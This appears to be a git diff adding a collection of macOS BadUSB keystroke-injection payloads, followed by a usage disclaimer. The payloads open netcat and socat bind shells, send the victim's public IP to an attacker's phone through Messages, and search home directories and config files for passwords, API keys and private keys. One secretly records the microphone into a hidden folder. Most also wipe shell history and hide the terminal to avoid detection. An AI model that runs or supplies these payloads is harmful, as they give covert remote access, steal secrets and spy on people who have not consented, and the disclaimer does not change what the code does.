Phone number +REM Shoutout to matthewkayne and 0iphor13 for the Phone code + + +REM Title: Public I.P. to Iphone +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(curl -s ifconfig.me/ip); osascript -e 'tell application "Messages" to send "'$x'" to buddy "ENTER PHONE NUMBER HERE"' +DELAY 500 +ENTER +DELAY 4000 +STRING CLEAR +DELAY 250 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Reverse Shell.txt b/BadUSB/MacOS-narstybits/RECON/Reverse Shell.txt new file mode 100644 index 00000000..de9a76bc --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Reverse Shell.txt @@ -0,0 +1,62 @@ +REM installs netcat using home-brew (can adjust delay) +REM Runs the command nohup nc -l -p 53000 -vvv -e /bin/bash to start a netcat listener on port 53000 +REM clears the terminal +REM Gui m minimizes the terminal window + + + +REM Now on your separate computer in your terminal Run the command 'nc 53000' +REM replace ' ' with the IP address of the target computer. +REM I've noticed that NC does not respond if you copy and paste so please type the I.P. out! +REM If the connection is successful, you should now have a remote shell session on the remote computer. + +REM To kill the listening port (53000 in this case) +REM you can use the kill command followed by the process ID (PID#) +REM to find the PID use command 'ps -ef | grep "nc -lvp 53000"' +REM Once you have the PID # run the command 'kill ' + + +REM to check if the port is closed +REM on the target computer run the command 'netstat -tuln | grep 53000' +REM If the listening port is closed, there should be no output or listing for port 53000. + + +REM Requirements: install netcat on both the remote target and your computer 'brew install netcat' +REM Requirements: Remote computer's IP address or hostname + +REM Title: Reverse Shell +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING brew install netcat +DELAY 250 +ENTER +DELAY 15000 +STRING nohup nc -l -p 53000 -vvv -e /bin/bash & +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 1000 +GUI w \ No newline at end of file diff --git a/BadUSB/MacOS-narstybits/RECON/SentinelStrike.txt b/BadUSB/MacOS-narstybits/RECON/SentinelStrike.txt new file mode 100644 index 00000000..e6eb2cf7 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/SentinelStrike.txt @@ -0,0 +1,82 @@ +REM macOS Security Testing and Reconnaissance Duckyscript (Local System) +REM Unveiling the Depths of macOS Security +REM Comprehensive Testing and Advanced Reconnaissance Capabilities +REM This Script pulls just about everything you would need to know about a target MAC + +REM Author: Narsty +REM Title: SentinelStrike +REM Target: MacOS +REM Version: 1.0 +REM Category: RECON + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 500 +STRING echo "Starting local system security testing and reconnaissance..." +ENTER +DELAY 1000 + +REM Gather System Information +STRING echo "----- System Information -----" +ENTER +STRING system_profiler SPHardwareDataType SPSoftwareDataType | grep -E "Model Identifier|Processor Name|Memory|Serial Number|OS Version" | sed 's/^\s*//' +ENTER +DELAY 1000 + +REM Check for Suspicious Processes +STRING echo "----- Suspicious Processes -----" +ENTER +STRING ps aux | grep -E "root|admin" | grep -v grep | awk '{print $2, $11}' +ENTER +DELAY 1000 + +REM List Startup Items +STRING echo "----- Startup Items -----" +ENTER +STRING ls -la /Library/LaunchAgents /Library/LaunchDaemons ~/Library/LaunchAgents +ENTER +DELAY 1000 + +REM Check User Accounts +STRING echo "----- User Accounts -----" +ENTER +STRING dscl . -list /Users | grep -v '_' +ENTER +DELAY 1000 + +REM Find Sensitive Files +STRING echo "----- Sensitive Files -----" +ENTER +STRING find ~ -type f \( -iname "*.key" -o -iname "*.pem" -o -iname "*.rsa" \) 2>/dev/null +ENTER +DELAY 1000 + +REM Search for Sensitive Information +STRING echo "----- Sensitive Information -----" +ENTER +STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --include='*.xml' --include='*.conf' --include='*.config' --include='*.properties' --include='*.ini' --include='*.env' --exclude-dir='.git' --exclude-dir='node_modules' "password\|username\|apikey\|secret" ~ 2>/dev/null +ENTER +DELAY 1000 + +REM Check for Unsecured Files and Directories +STRING echo "----- Unsecured Files and Directories -----" +ENTER +STRING find ~ -type d \( -iname "public" -o -iname "www" \) 2>/dev/null +ENTER +DELAY 1000 + +REM Finished +STRING echo "----- Security testing and reconnaissance completed! -----" +ENTER + + + + diff --git a/BadUSB/MacOS-narstybits/RECON/SocatShell.txt b/BadUSB/MacOS-narstybits/RECON/SocatShell.txt new file mode 100644 index 00000000..5361c530 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/SocatShell.txt @@ -0,0 +1,47 @@ +REM This script sets up a TCP listener using socat for remote shell access. +REM Proceeds to clear the terminal and minimize the window for stealth. +REM It listens on the specified port (6300) + + +REM Once this script is executed there will be an open listener on port 6300 +REM you will be able to use the command 'socat STDIN TCP: :6300' +REM this will establish a connection to the remote computer on port 6300 +REM and you should be able to interact with the remote shell + +REM Requirement: i.p. of target MacOs and socat application +REM can install using homebrew 'brew install socat' + +REM Title: SocatShell +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +ENTER +DELAY 500 +STRING nohup socat TCP-LISTEN:6300 EXEC:/bin/bash &>/dev/null & +DELAY 2000 +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 250 +GUI w + + diff --git a/BadUSB/MacOS-narstybits/RECON/StealthSeeker.txt b/BadUSB/MacOS-narstybits/RECON/StealthSeeker.txt new file mode 100644 index 00000000..15768469 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/StealthSeeker.txt @@ -0,0 +1,50 @@ +REM This script focuses on searching for common sensitive information +REM including passwords, secrets, API keys, and configuration files. +REM It performs a file search within specific file types and looks for specific patterns. +REM The output will display any matches found in the search process. + +REM Author: Narsty +REM Title: StealthSeeker +REM Target: MacOS +REM Version: 1.0 +REM Category: RECON + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 500 +STRING echo "Initiating macOS sensitive information search..." +ENTER +DELAY 1000 + +REM Search for Passwords and Secrets +STRING echo "----- Passwords and Secrets -----" +ENTER +STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --exclude-dir='.git' --exclude-dir='node_modules' "password\|secret\|apikey\|taxes\|passport" ~ 2>/dev/null +ENTER +DELAY 1000 + +REM Search for Configuration Files +STRING echo "----- Configuration Files -----" +ENTER +STRING find / -type f \( -iname "*.conf" -o -iname "*.config" -o -iname "*.properties" -o -iname "*.ini" \) 2>/dev/null | xargs grep -E "username|password|apikey|secret" 2>/dev/null +ENTER +DELAY 1000 + +REM Finished +STRING echo "----- macOS sensitive information search completed! -----" +ENTER + + + + + + diff --git a/BadUSB/MacOS-narstybits/RECON/SysNet Info.txt b/BadUSB/MacOS-narstybits/RECON/SysNet Info.txt new file mode 100644 index 00000000..ef03e0fb --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/SysNet Info.txt @@ -0,0 +1,21 @@ +REM User Information: Includes the username, home directory, and user ID. +REM System Information: Displays details about the operating system. +REM Network Information: Shows network interface information IP address. +REM File and Directory Permissions: Provides permissions and ownership details of files and directories. + +REM Author: Narsty +REM Title: SysNet Info +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 1000 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING echo "User Information:" && echo "Username: $(whoami)" && echo "Home Directory: $HOME" && echo "User ID: $(id -u)" && echo && echo "System Information:" && uname -a && echo && echo "Network Information:" && ifconfig && echo && echo "File and Directory Permissions:" && ls -l + diff --git a/BadUSB/MacOS-narstybits/RECON/Voice Logger.txt b/BadUSB/MacOS-narstybits/RECON/Voice Logger.txt new file mode 100644 index 00000000..9f89b1d9 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Voice Logger.txt @@ -0,0 +1,61 @@ +REM Creates a hidden folder named .phantom_audio in the home directory. +REM Writes a Python script (record.py) that uses the sox utility +REM to record audio from the microphone and save it as a .mp3 file. + +REM Once executed, the audio recording will start and continue until manually stopped +REM You can stop the audio recording by finding the PID and using 'kill pid#' +REM The recording is saved in the .phantom_audio directory under the home directory + +REM To access the audio file easily, you can use the following steps: +REM Open a new Finder window. Go to the "Go" menu in the menu bar and select "Go to Folder" +REM enter "~/.phantom_audio" and click the "Go" button. +REM navigate to the .phantom_audio folder where you can find the "Secret audio.mp3" file. + +REM To delete the hidden folder use command 'rm -r ~/.phantom_audio' + +REM Requirements: SOX you can install through homebrew 'brew install sox' + +REM Author: Narsty +REM Title: Phantom Audio Capturer +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 1000 +STRING screen -dm bash -c "nohup python3 record.py &" +DELAY 200 +ENTER +DELAY 500 +STRING tccutil reset Microphone com.apple.Terminal +DELAY 500 +ENTER +STRING mkdir -p ~/.phantom_audio && cd ~/.phantom_audio +DELAY 500 +ENTER +DELAY 500 +STRING echo 'import os\nimport subprocess\nimport datetime\n\nfilename = "Secret audio.mp3"\ncmd = f"sox -d -C 128 -r 44100 \"{filename}\""\nsubprocess.Popen(cmd, shell=True)' > record.py +DELAY 1000 +ENTER +DELAY 500 +STRING nohup python3 record.py & +ENTER +DELAY 250 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Web Scraper.txt b/BadUSB/MacOS-narstybits/RECON/Web Scraper.txt new file mode 100644 index 00000000..15217c54 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Web Scraper.txt @@ -0,0 +1,45 @@ +REM Web Scraping and Output to Desktop. +REM This script performs web scraping on a target website and saves the extracted data to a text file on the desktop. +REM Make sure to replace the target website URL and adjust the delay timings as needed for optimal performance. + + +REM Please note that web scraping may have legal and ethical implications, +REM script should only be performed on websites you have permission to access and scrape data from. +REM Replace 'https://www.example.com' with the target website URL. + + + +REM Author: Narsty +REM Title: Web Scraper +REM Version: 1.0 +REM Target: MacOs +REM Category: Recon + + +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING cd ~/Desktop +DELAY 500 +ENTER +DELAY 500 +STRING touch output.txt +DELAY 500 +ENTER +DELAY 500 +STRING curl -s https://www.example.com > output.txt +DELAY 1000 +ENTER +DELAY 500 +STRING open -e output.txt +DELAY 1000 +ENTER + + + + + diff --git a/BadUSB/MacOS-narstybits/Warning Readme.md b/BadUSB/MacOS-narstybits/Warning Readme.md new file mode 100644 index 00000000..6466391d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Warning Readme.md @@ -0,0 +1,48 @@ + + + + + + + + + + + + + + + + + ++++Caution: Read before proceeding
+++Usage Limitations: +
+The scripts and codes provided by Narsty are intended solely for the purpose of testing security protocols and penetration testing. They should be used only in compliance with all applicable laws and regulations.
+++Authorization Required: +
+It is essential to obtain proper authorization and consent before using any scripts or codes on computer systems or networks (EVEN PRANKS). Ensure that you have explicit permission from the owner or authorized administrator of the system(s) you intend to test or evaluate.
+++Responsible Use: +
+Exercise utmost responsibility while utilizing these scripts and codes. Any unauthorized or malicious activities are strictly prohibited. Engaging in unauthorized access, tampering with data, or compromising the privacy of individuals without consent is illegal and unethical.
+++Legal Compliance: +
+Familiarize yourself with the laws, regulations, and guidelines applicable in your jurisdiction regarding computer security, ethical hacking, and information privacy. Ensure compliance with all relevant legal obligations.
+++ +Accountability: +
+By using Narsty's scripts and codes, you acknowledge that you are solely responsible for any actions or consequences resulting from their use. Narsty cannot be held liable for any misuse, damage, or legal ramifications arising from unauthorized or unethical activities.
+